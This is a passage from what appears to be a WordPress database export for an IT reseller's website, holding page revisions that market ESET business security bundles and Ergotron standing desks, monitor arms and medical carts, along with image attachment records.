<li>Secure access via web browser</li>\r\n 	<li>Always the latest version â€“ updates automatically</li>\r\n 	<li>No need for extra hardware</li>\r\n</ul>\r\n<h3><strong>Bundled solutions for small size business</strong></h3>\r\n<ol>\r\n 	<li><strong>ESET Secure Business Cloud</strong></li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li><strong>ESET Endpoint Protection Advanced Cloud</strong></li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li><strong>ESET Endpoint Protection Advanced</strong></li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<h2><strong>Dynamic endpoint security for mid-size businesses</strong></h2>\r\n<h3><strong>Easy to use, single interface management of your endpoint security</strong></h3>\r\nESET Security Management Center provides a real-time overview of all your on-premise and off premise endpoints via an enterprise-grade console. Benefit from full reporting and security management for all operating systems.\r\n\r\n<img class=\"alignnone  wp-image-2447\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mid-size.png\" alt=\"\" width=\"269\" height=\"177\" />\r\n<ul>\r\n 	<li>Complete network visibility</li>\r\n 	<li>Full security management</li>\r\n 	<li>Flexible reporting</li>\r\n 	<li>Automated security management</li>\r\n</ul>\r\n<h3><strong>Bundled solutions for mid size business</strong></h3>\r\n<ol>\r\n 	<li><strong>ESET Secure Business</strong></li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li><strong>ESET Dynamic Endpoint Protection</strong></li>\r\n</ol>\r\nEnterprise-grade award-winning ESET endpoint protection with cloud-based sandboxing technology. Incorporates behavior-based detection easily managed via a single online console. Provides:\r\n<ul>\r\n 	<li>Targeted attacks protection</li>\r\n 	<li>Advanced persistent threats detection</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Zero-day threats detection</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li><strong>ESET Endpoint Protection Advanced</strong></li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<h2><strong>Future ready cybersecurity for enterprise</strong></h2>\r\n<h3><strong>Bundled solutions for enterprise</strong></h3>\r\nFits all security requirements. Flexible and scalable to any IT environment.\r\n<ol>\r\n 	<li><strong>ESET Elite Targeted Attack Protection</strong></li>\r\n</ol>\r\nFull-scale protection encompassing all ESETâ€™s latest technologies and services for eliminating all known and unknown threats. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n 	<li>Manual Malware Analysis</li>\r\n 	<li>Forensic Analysis &amp; Consulting</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li><strong>ESET Targeted Attack Protection</strong></li>\r\n</ol>\r\nComplete, seamless prevention, detection and response solution, incorporating total visibility, for remediation of any security issue in the network. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li><strong>ESET Dynamic Endpoint Protection</strong></li>\r\n</ol>\r\nComprehensive, easily managed protection, incorporating off-premise cloud sandboxing leveraging machine learning and behavior-based detection. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n</ul>\r\n<ol start=\"4\">\r\n 	<li><strong>ESET Endpoint Protection Advanced</strong></li>\r\n</ol>\r\nMultilayered protection utilizing multiple technologies and incorporating visibility management and reporting across all operating systems. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n</ul>\r\n<ol start=\"5\">\r\n 	<li><strong>ESET Dynamic Mail Protection</strong></li>\r\n</ol>\r\nBusiness solution incorporating antispam, anti-phishing and Cloud Sandbox Analysis for the complete protection of mailboxes and mail servers. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Mail Security</li>\r\n</ul>\r\n<ol start=\"6\">\r\n 	<li><strong>ESET Identity &amp; Data Protection</strong></li>\r\n</ol>\r\nBusiness solution for superior and enhanced protection of an organizationâ€™s data and intellectual property. Includes:\r\n<ul>\r\n 	<li>Two-factor Authentication</li>\r\n 	<li>Endpoint Encryption</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;','ESET','','inherit','closed','closed','','1477-revision-v1','','','2018-12-18 21:00:34','2018-12-18 13:00:34','',1477,'https://bintara.com.my/blog/2018/12/18/1477-revision-v1/',0,'revision','',0),(2488,1,'2018-12-18 23:01:46','2018-12-18 15:01:46','','WorkFit-S,Â Dual Workstation with WorksurfaceÂ ','','inherit','closed','closed','','workfit-s-dual-workstation-with-worksurface','','','2018-12-18 23:01:46','2018-12-18 15:01:46','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg',0,'attachment','image/jpeg',0),(2489,1,'2018-12-18 23:04:07','2018-12-18 15:04:07','','LX Desk Monitor ArmÂ ','','inherit','closed','closed','','lx-desk-monitor-arm','','','2018-12-18 23:04:07','2018-12-18 15:04:07','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg',0,'attachment','image/jpeg',0),(2493,1,'2018-12-18 23:08:32','2018-12-18 15:08:32','','WorkFit-C, Dual Sit-Stand Workstation','','inherit','closed','closed','','workfit-c-dual-sit-stand-workstation','','','2018-12-18 23:08:32','2018-12-18 15:08:32','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg',0,'attachment','image/jpeg',0),(2490,1,'2018-12-18 23:05:35','2018-12-18 15:05:35','','LX Dual Stacking ArmÂ ','','inherit','closed','closed','','lx-dual-stacking-arm','','','2018-12-18 23:05:35','2018-12-18 15:05:35','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg',0,'attachment','image/jpeg',0),(2491,1,'2018-12-18 23:07:00','2018-12-18 15:07:00','','LX Wall Monitor Arm','','inherit','closed','closed','','lx-wall-monitor-arm','','','2018-12-18 23:07:00','2018-12-18 15:07:00','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg',0,'attachment','image/jpeg',0),(2492,1,'2018-12-18 23:07:48','2018-12-18 15:07:48','','WorkFit-C, Single LD Sit-Stand Workstation','','inherit','closed','closed','','workfit-c-single-ld-sit-stand-workstation','','','2018-12-18 23:07:48','2018-12-18 15:07:48','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg',0,'attachment','image/jpeg',0),(2495,1,'2018-12-18 23:10:25','2018-12-18 15:10:25','','StyleViewÂ® Laptop Cart, SV40','','inherit','closed','closed','','styleview-laptop-cart-sv40','','','2018-12-18 23:10:25','2018-12-18 15:10:25','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg',0,'attachment','image/jpeg',0),(2494,1,'2018-12-18 23:09:22','2018-12-18 15:09:22','','Â Neo-FlexÂ® Laptop Cart','','inherit','closed','closed','','neo-flex-laptop-cart','','','2018-12-18 23:09:22','2018-12-18 15:09:22','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg',0,'attachment','image/jpeg',0),(2496,1,'2018-12-18 23:11:26','2018-12-18 15:11:26','','Â StyleViewÂ® Telemedicine Cart, Single Monitor, Powered','','inherit','closed','closed','','styleview-telemedicine-cart-single-monitor-powered','','','2018-12-18 23:11:26','2018-12-18 15:11:26','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg',0,'attachment','image/jpeg',0),(3516,1,'2019-09-26 15:15:54','2019-09-26 07:15:54','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<ol>\r\n<li><strong>Ergonomics</strong></li>\r\n</ol>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong>\r\n\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"alignnone wp-image-2486\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" width=\"175\" height=\"175\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\" width=\"148\" height=\"148\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" width=\"174\" height=\"174\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements.\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"145\" height=\"145\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"148\" height=\"148\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" width=\"151\" height=\"150\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\" width=\"159\" height=\"159\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\" width=\"160\" height=\"159\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\" width=\"148\" height=\"149\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\" width=\"157\" height=\"158\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:15:54','2019-09-26 07:15:54','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(2498,1,'2018-12-18 23:12:59','2018-12-18 15:12:59','','CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â ','','inherit','closed','closed','','carefit-slim-lcd-cart-1-drawer-1x1','','','2018-12-18 23:12:59','2018-12-18 15:12:59','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg',0,'attachment','image/jpeg',0),(2497,1,'2018-12-18 23:12:12','2018-12-18 15:12:12','','StyleViewÂ® Telemedicine Cart, PoweredÂ ','','inherit','closed','closed','','styleview-telemedicine-cart-powered','','','2018-12-18 23:12:12','2018-12-18 15:12:12','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg',0,'attachment','image/jpeg',0),(2500,1,'2018-12-18 23:15:29','2018-12-18 15:15:29','<h2 class=\"h4\"><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n<h3 class=\"text-center mgnbtm2\">Why Choose Ergotron?</h3>\r\n<ol>\r\n 	<li><strong>Ergonomics</strong></li>\r\n</ol>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong>\r\n\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"alignnone wp-image-2486\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" width=\"175\" height=\"175\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\" width=\"148\" height=\"148\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" width=\"174\" height=\"174\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements.\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"145\" height=\"145\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"148\" height=\"148\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" width=\"151\" height=\"150\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\" width=\"159\" height=\"159\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\" width=\"160\" height=\"159\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\" width=\"148\" height=\"149\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\" width=\"157\" height=\"158\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" 